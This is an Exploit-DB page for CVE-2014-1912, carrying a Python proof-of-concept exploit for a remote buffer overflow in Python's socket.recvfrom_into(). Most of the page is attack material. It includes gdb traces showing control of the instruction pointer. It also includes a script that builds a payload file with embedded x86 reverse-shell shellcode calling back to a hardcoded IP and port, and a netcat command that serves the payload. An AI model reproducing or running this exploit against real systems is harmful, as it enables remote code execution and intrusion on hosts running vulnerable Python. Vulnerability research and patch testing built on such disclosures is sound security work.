Python - 'socket.recvfrom_into()' Remote Buffer Overflow

EDB-ID:

31875

CVE:

2014-1912

EDB Verified:

Author:

Sha0

Type:

remote

Exploit:   /  

Platform:

Linux

Date:

2014-02-24

Vulnerable App: 
#!/usr/bin/env python

'''
# Exploit Title: python socket.recvfrom_into() remote buffer overflow
# Date: 21/02/2014
# Exploit Author: @sha0coder
# Vendor Homepage: python.org
# Version: python2.7 and python3
# Tested on: linux 32bit + python2.7
# CVE : CVE-2014-1912



socket.recvfrom_into() remote buffer overflow Proof of concept
by @sha0coder

TODO: rop to evade stack nx 


(gdb) x/i $eip
=> 0x817bb28:	mov    eax,DWORD PTR [ebx+0x4]       <--- ebx full control => eax full conrol
   0x817bb2b:	test   BYTE PTR [eax+0x55],0x40
   0x817bb2f:	jne    0x817bb38 -->
   ...
   0x817bb38:	mov    eax,DWORD PTR [eax+0xa4]      <--- eax full control again
   0x817bb3e:	test   eax,eax
   0x817bb40:	jne    0x817bb58 -->
   ...
   0x817bb58:	mov    DWORD PTR [esp],ebx
   0x817bb5b:	call   eax <--------------------- indirect fucktion call ;)


$ ./pyrecvfrominto.py 
	egg file generated

$ cat egg | nc -l 8080 -vv

... when client connects ... or wen we send the evil buffer to the server ...

0x0838591c in ?? ()
1: x/5i $eip
=> 0x838591c:	int3    			<--------- LANDED!!!!!
   0x838591d:	xor    eax,eax
   0x838591f:	xor    ebx,ebx
   0x8385921:	xor    ecx,ecx
   0x8385923:	xor    edx,edx

'''

import struct

def off(o):
	return struct.pack('L',o)


reverseIP = '\xc0\xa8\x04\x34'   #'\xc0\xa8\x01\x0a'
reversePort = '\x7a\x69'


#shellcode from exploit-db.com, (remove the sigtrap)
shellcode = "\xcc\x31\xc0\x31\xdb\x31\xc9\x31\xd2"\
			"\xb0\x66\xb3\x01\x51\x6a\x06\x6a"\
			"\x01\x6a\x02\x89\xe1\xcd\x80\x89"\
			"\xc6\xb0\x66\x31\xdb\xb3\x02\x68"+\
			reverseIP+"\x66\x68"+reversePort+"\x66\x53\xfe"\
			"\xc3\x89\xe1\x6a\x10\x51\x56\x89"\
			"\xe1\xcd\x80\x31\xc9\xb1\x03\xfe"\
			"\xc9\xb0\x3f\xcd\x80\x75\xf8\x31"\
			"\xc0\x52\x68\x6e\x2f\x73\x68\x68"\
			"\x2f\x2f\x62\x69\x89\xe3\x52\x53"\
			"\x89\xe1\x52\x89\xe2\xb0\x0b\xcd"\
			"\x80"


shellcode_sz = len(shellcode)

print 'shellcode sz %d' % shellcode_sz


ebx =  0x08385908
sc_off = 0x08385908+20

padd = 'AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMM'

'''           
        +------------+----------------------+         +--------------------+
        |            |                      |         |                    |
        V            |                      |         V                    |
'''
buff = 'aaaa' + off(ebx) + 'aaaaaAAA'+ off(ebx) + shellcode + padd + off(sc_off)  # .. and landed ;)


print 'buff sz: %s' % len(buff)
open('egg','w').write(buff)
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services